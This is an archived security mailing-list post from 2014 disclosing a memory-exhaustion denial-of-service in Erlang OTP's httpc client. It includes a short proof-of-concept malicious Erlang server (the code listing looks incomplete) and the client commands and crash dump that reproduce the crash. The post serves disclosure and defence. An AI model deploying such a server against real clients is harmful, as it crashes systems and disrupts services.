Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 2 May 2014 13:13:12 +0200
From: Seba <>
Subject: Erlang OTP's httpc module Denial of Service


  I've reported this issue to erlang-bugs mailing list:


Sebastián Tello.

Using httpc to connect to a malicious server can cause the system to run
out of memory and crash.


When requesting a URL from an untrusted source using the httpc OTP module,
if the server:
 - accepts the connection
 - does not read from the socket
 - and indefinitely writes bytes in the socket.

Then the client will keep on allocating memory until the system crashes.

Proof of concept

Server-side (attacker):

==== PoC module: httpc_dos.erl ====

-export([server/1, server/0]).

server() -> server(5678).
  {ok, LSock} = gen_tcp:listen(Port, [binary, {packet, 0},
                                        {active, false}]),
  {ok, Sock} = gen_tcp:accept(LSock),

socket_write(Sock) ->
    ok = gen_tcp:send(Sock, lists:flatten(lists:duplicate(4096, "A"))),
======== EOF =====

Start the server (use the above module).

1> httpc_dos:server(5678).

Client-side (httpc), connect to the server:

$ erl
Erlang/OTP 17 [erts-6.0] [source] [64-bit] [smp:4:4] [async-threads:10]
[hipe] [kernel-poll:false]

Eshell V6.0  (abort with ^G)
1> application:start(inets).
2> httpc:request("http://SERVER_IP:5678").

Crash dump was written to: erl_crash.dump
eheap_alloc: Cannot allocate 1167696400 bytes of memory (of type "heap").

Tested on
OTP 17
Ubuntu 12.04 x86_64


Use lhttpc ( haven't been able to reproduce
the issue using lhttpc
as the call will crash when the response size is too large.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ